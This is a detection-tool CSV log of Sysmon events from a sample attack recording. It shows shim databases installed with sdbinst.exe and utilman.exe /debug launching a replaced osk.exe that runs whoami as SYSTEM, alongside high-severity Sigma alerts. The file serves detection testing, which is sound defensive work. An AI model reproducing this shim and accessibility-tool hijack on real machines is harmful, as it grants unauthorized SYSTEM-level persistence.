2019-03-20 05:41:16.626 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\wbem\unsecapp.exe -Embedding  :  Path: C:\Windows\System32\wbem\unsecapp.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:41:17.026 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\UI0Detect.exe  :  Path: C:\Windows\System32\UI0Detect.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:41:22.404 +09:00,PC01.example.corp,1,informational,Process Creation,Command: taskhost.exe SYSTEM  :  Path: C:\Windows\System32\taskhost.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:42:00.148 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""taskhost.exe""  :  Path: C:\Windows\System32\taskhost.exe  :  User: EXAMPLE\user01  :  Parent Command: C:\Windows\system32\services.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:42:00.329 +09:00,PC01.example.corp,1,informational,Process Creation,Command: atbroker.exe  :  Path: C:\Windows\System32\AtBroker.exe  :  User: EXAMPLE\user01  :  Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:42:00.419 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\system32\slui.exe""  :  Path: C:\Windows\System32\slui.exe  :  User: EXAMPLE\user01  :  Parent Command: winlogon.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:42:00.489 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\System32\slui.exe -Embedding  :  Path: C:\Windows\System32\slui.exe  :  User: EXAMPLE\user01  :  Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:42:37.392 +09:00,PC01.example.corp,1,informational,Process Creation,Command: gpscript.exe /Logon  :  Path: C:\Windows\System32\gpscript.exe  :  User: EXAMPLE\user01  :  Parent Command: C:\Windows\system32\svchost.exe -k GPSvcGroup,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:42:37.432 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\userinit.exe  :  Path: C:\Windows\System32\userinit.exe  :  User: EXAMPLE\user01  :  Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:42:37.602 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\Explorer.EXE  :  Path: C:\Windows\explorer.exe  :  User: EXAMPLE\user01  :  Parent Command: C:\Windows\system32\userinit.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:42:38.654 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\System32\cmd.exe"" /c msg *  ""hello from run key""  :  Path: C:\Windows\System32\cmd.exe  :  User: EXAMPLE\user01  :  Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:42:38.704 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\PSEXESVC.exe""   :  Path: C:\Windows\PSEXESVC.exe  :  User: EXAMPLE\user01  :  Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:42:38.774 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: msg  *  ""hello from run key""  :  Path: C:\Windows\System32\msg.exe  :  User: EXAMPLE\user01  :  Parent Command: ""C:\Windows\System32\cmd.exe"" /c msg *  ""hello from run key""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:43:24.560 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Program Files\Windows Media Player\wmpnetwk.exe""  :  Path: C:\Program Files\Windows Media Player\wmpnetwk.exe  :  User: NT AUTHORITY\NETWORK SERVICE  :  Parent Command: C:\Windows\system32\services.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:46:04.916 +09:00,PC01.example.corp,1,informational,Process Creation,Command: UI0Detect.exe 224  :  Path: C:\Windows\System32\UI0Detect.exe  :  User: EXAMPLE\user01  :  Parent Command: C:\Windows\system32\UI0Detect.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:46:20.518 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe""   :  Path: C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe  :  User: EXAMPLE\user01  :  Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:48:33.439 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\system32\sdbinst.exe"" -q ""C:\Windows\AppPatch\Test.SDB  ""    :  Path: C:\Windows\System32\sdbinst.exe  :  User: EXAMPLE\user01  :  Parent Command: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:48:33.439 +09:00,PC01.example.corp,1,high,Possible Shim Database Persistence via sdbinst.exe,,rules/sigma/process_creation/win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:48:33.559 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\System32\osk.exe""   :  Path: C:\Windows\System32\osk.exe  :  User: EXAMPLE\user01  :  Parent Command: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:48:33.860 +09:00,PC01.example.corp,1,informational,Process Creation,Command: utilman.exe /debug  :  Path: C:\Windows\System32\Utilman.exe  :  User: EXAMPLE\user01  :  Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:48:33.870 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\system32\sdbinst.exe"" -q -u ""C:\Windows\AppPatch\Test.SDB  ""    :  Path: C:\Windows\System32\sdbinst.exe  :  User: EXAMPLE\user01  :  Parent Command: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:48:33.870 +09:00,PC01.example.corp,1,high,Possible Shim Database Persistence via sdbinst.exe,,rules/sigma/process_creation/win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:48:33.920 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\System32\osk.exe""   :  Path: C:\Windows\System32\osk.exe  :  User: EXAMPLE\user01  :  Parent Command: utilman.exe /debug",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:48:36.644 +09:00,PC01.example.corp,1,informational,Process Creation,Command: utilman.exe /debug  :  Path: C:\Windows\System32\Utilman.exe  :  User: EXAMPLE\user01  :  Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:49:27.787 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\system32\sdbinst.exe"" -q ""C:\Windows\AppPatch\Test.SDB  ""    :  Path: C:\Windows\System32\sdbinst.exe  :  User: EXAMPLE\user01  :  Parent Command: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:49:27.787 +09:00,PC01.example.corp,1,high,Possible Shim Database Persistence via sdbinst.exe,,rules/sigma/process_creation/win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:49:27.967 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\System32\osk.exe""   :  Path: C:\Windows\System32\osk.exe  :  User: EXAMPLE\user01  :  Parent Command: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:49:27.988 +09:00,PC01.example.corp,1,informational,Process Creation,Command: utilman.exe /debug  :  Path: C:\Windows\System32\Utilman.exe  :  User: EXAMPLE\user01  :  Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:49:28.158 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\System32\osk.exe""   :  Path: C:\Windows\System32\osk.exe  :  User: EXAMPLE\user01  :  Parent Command: utilman.exe /debug",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:49:28.158 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\system32\sdbinst.exe"" -q -u ""C:\Windows\AppPatch\Test.SDB  ""    :  Path: C:\Windows\System32\sdbinst.exe  :  User: EXAMPLE\user01  :  Parent Command: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:49:28.158 +09:00,PC01.example.corp,1,high,Possible Shim Database Persistence via sdbinst.exe,,rules/sigma/process_creation/win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:49:31.212 +09:00,PC01.example.corp,1,informational,Process Creation,Command: utilman.exe /debug  :  Path: C:\Windows\System32\Utilman.exe  :  User: EXAMPLE\user01  :  Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:49:44.792 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\system32\sdbinst.exe"" -q ""C:\Windows\AppPatch\Test.SDB  ""    :  Path: C:\Windows\System32\sdbinst.exe  :  User: EXAMPLE\user01  :  Parent Command: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:49:44.792 +09:00,PC01.example.corp,1,high,Possible Shim Database Persistence via sdbinst.exe,,rules/sigma/process_creation/win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:49:44.972 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\System32\osk.exe""   :  Path: C:\Windows\System32\osk.exe  :  User: EXAMPLE\user01  :  Parent Command: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:49:44.982 +09:00,PC01.example.corp,1,informational,Process Creation,Command: utilman.exe /debug  :  Path: C:\Windows\System32\Utilman.exe  :  User: EXAMPLE\user01  :  Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:49:45.152 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\System32\osk.exe""   :  Path: C:\Windows\System32\osk.exe  :  User: EXAMPLE\user01  :  Parent Command: utilman.exe /debug",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:49:45.162 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\system32\sdbinst.exe"" -q -u ""C:\Windows\AppPatch\Test.SDB  ""    :  Path: C:\Windows\System32\sdbinst.exe  :  User: EXAMPLE\user01  :  Parent Command: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:49:45.162 +09:00,PC01.example.corp,1,high,Possible Shim Database Persistence via sdbinst.exe,,rules/sigma/process_creation/win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:49:47.245 +09:00,PC01.example.corp,1,informational,Process Creation,Command: utilman.exe /debug  :  Path: C:\Windows\System32\Utilman.exe  :  User: EXAMPLE\user01  :  Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:51:05.017 +09:00,PC01.example.corp,1,informational,Process Creation,Command: UI0Detect.exe 224  :  Path: C:\Windows\System32\UI0Detect.exe  :  User: EXAMPLE\user01  :  Parent Command: C:\Windows\system32\UI0Detect.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:52:25.933 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\system32\sdbinst.exe"" -q ""C:\Windows\AppPatch\Test.SDB  ""    :  Path: C:\Windows\System32\sdbinst.exe  :  User: EXAMPLE\user01  :  Parent Command: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:52:25.933 +09:00,PC01.example.corp,1,high,Possible Shim Database Persistence via sdbinst.exe,,rules/sigma/process_creation/win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:52:26.104 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\System32\osk.exe""   :  Path: C:\Windows\System32\osk.exe  :  User: EXAMPLE\user01  :  Parent Command: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:52:26.114 +09:00,PC01.example.corp,1,informational,Process Creation,Command: utilman.exe /debug  :  Path: C:\Windows\System32\Utilman.exe  :  User: EXAMPLE\user01  :  Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:52:26.274 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\System32\osk.exe""   :  Path: C:\Windows\System32\osk.exe  :  User: EXAMPLE\user01  :  Parent Command: utilman.exe /debug",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:52:26.364 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\system32\sdbinst.exe"" -q -u ""C:\Windows\AppPatch\Test.SDB  ""    :  Path: C:\Windows\System32\sdbinst.exe  :  User: EXAMPLE\user01  :  Parent Command: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:52:26.364 +09:00,PC01.example.corp,1,high,Possible Shim Database Persistence via sdbinst.exe,,rules/sigma/process_creation/win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:52:29.138 +09:00,PC01.example.corp,1,informational,Process Creation,Command: utilman.exe /debug  :  Path: C:\Windows\System32\Utilman.exe  :  User: EXAMPLE\user01  :  Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:52:47.124 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\system32\sdbinst.exe"" -q ""C:\Windows\AppPatch\Test.SDB  ""    :  Path: C:\Windows\System32\sdbinst.exe  :  User: EXAMPLE\user01  :  Parent Command: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:52:47.124 +09:00,PC01.example.corp,1,high,Possible Shim Database Persistence via sdbinst.exe,,rules/sigma/process_creation/win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:52:47.294 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\System32\osk.exe""   :  Path: C:\Windows\System32\osk.exe  :  User: EXAMPLE\user01  :  Parent Command: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:52:47.334 +09:00,PC01.example.corp,1,informational,Process Creation,Command: utilman.exe /debug  :  Path: C:\Windows\System32\Utilman.exe  :  User: EXAMPLE\user01  :  Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:52:47.474 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\System32\osk.exe""   :  Path: C:\Windows\System32\osk.exe  :  User: EXAMPLE\user01  :  Parent Command: utilman.exe /debug",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:52:47.474 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\system32\sdbinst.exe"" -q -u ""C:\Windows\AppPatch\Test.SDB  ""    :  Path: C:\Windows\System32\sdbinst.exe  :  User: EXAMPLE\user01  :  Parent Command: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:52:47.474 +09:00,PC01.example.corp,1,high,Possible Shim Database Persistence via sdbinst.exe,,rules/sigma/process_creation/win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:52:50.268 +09:00,PC01.example.corp,1,informational,Process Creation,Command: utilman.exe /debug  :  Path: C:\Windows\System32\Utilman.exe  :  User: EXAMPLE\user01  :  Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:56:05.149 +09:00,PC01.example.corp,1,informational,Process Creation,Command: UI0Detect.exe 224  :  Path: C:\Windows\System32\UI0Detect.exe  :  User: EXAMPLE\user01  :  Parent Command: C:\Windows\system32\UI0Detect.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:58:20.994 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\system32\sdbinst.exe"" -q ""C:\Users\user01\Desktop\titi.sdb""    :  Path: C:\Windows\System32\sdbinst.exe  :  User: EXAMPLE\user01  :  Parent Command: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:58:20.994 +09:00,PC01.example.corp,1,high,Possible Shim Database Persistence via sdbinst.exe,,rules/sigma/process_creation/win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:58:28.214 +09:00,PC01.example.corp,1,informational,Process Creation,Command: \SystemRoot\System32\smss.exe 00000000 0000003c   :  Path: C:\Windows\System32\smss.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: \SystemRoot\System32\smss.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:58:28.294 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: %%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,12288,512 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16  :  Path: C:\Windows\System32\csrss.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: \SystemRoot\System32\smss.exe 00000000 0000003c ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:58:28.304 +09:00,PC01.example.corp,1,informational,Process Creation,Command: winlogon.exe  :  Path: C:\Windows\System32\winlogon.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: \SystemRoot\System32\smss.exe 00000000 0000003c ,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:58:28.815 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""LogonUI.exe"" /flags:0x0  :  Path: C:\Windows\System32\LogonUI.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: winlogon.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:58:31.860 +09:00,PC01.example.corp,1,informational,Process Creation,Command: utilman.exe /debug  :  Path: C:\Windows\System32\Utilman.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:58:35.745 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""c:\osk.exe""   :  Path: C:\osk.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: utilman.exe /debug",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:58:44.237 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: whoami  :  Path: C:\Windows\System32\whoami.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: ""c:\osk.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:58:44.237 +09:00,PC01.example.corp,1,high,Run Whoami as SYSTEM,,rules/sigma/process_creation/win_whoami_as_system.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
